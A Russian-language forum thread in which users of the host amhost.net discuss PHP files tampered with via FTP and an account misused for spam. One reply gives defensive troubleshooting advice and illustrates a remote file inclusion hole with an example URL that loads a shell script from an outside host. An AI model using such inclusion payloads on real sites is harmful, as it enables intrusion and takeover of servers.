amhost.net - хакают ФТП

[Hector]

Кто юзает сабж? У меня с завидной регулярностью кто-то там прописывает срань в php файлах. Вот думаю это или хостинг гавно или что-то другое.

[Alexsize]

ТС ip хостинга случайно не *.*.229.91 ?

Сегодня амхост меня в рассылке обвинил, закрыли акк.

Кто то майлером с моего ftp шалил.

То что пароли ушли не у меня я уверен xD

Амхост уверен наоборот )

Впрочем все оперативно порешали, сейчас меняю пароли и надеюсь что такого больше не повториться, блоги жалко.

[KongWeiLing]

ТС а ты вообще уверен в своих скриптах? может твоя самопальная тдска дырява? и раз проста как пять копеек то в ней вообще может быть инклюд типа tds.php?open=http://coolhazker.narod.ru/shell.txt?
а то вообще по твоим словам создается впечатление, что в безопасности ты не очень разбираешься. Кстати, если оунер скриптов тотже юзер от которого они запускаются то 644 права нифига не ограничат от записи.

я бы провел бы следующие действия:
1) лог обращений к серверу прошерстил бы на предмет кавычек и характерных пхп функций. а также если у тебя одни редиректы то вообще на открытие страниц с нередиректным кодом (200)
2) лог фтп, если есть, на предмет не твоих айпишек
3) все параметры принимаемые твоими скриптами минимум почекал бы на прием кавычек, знаков конца строки, и если они выдают ошибки то задумайся о скриптах.(это можно и не разбираясь в пхп и безопасности сделать)
4)если дедик и софт на серваке ставил сам, проверь может по старое и дырявое.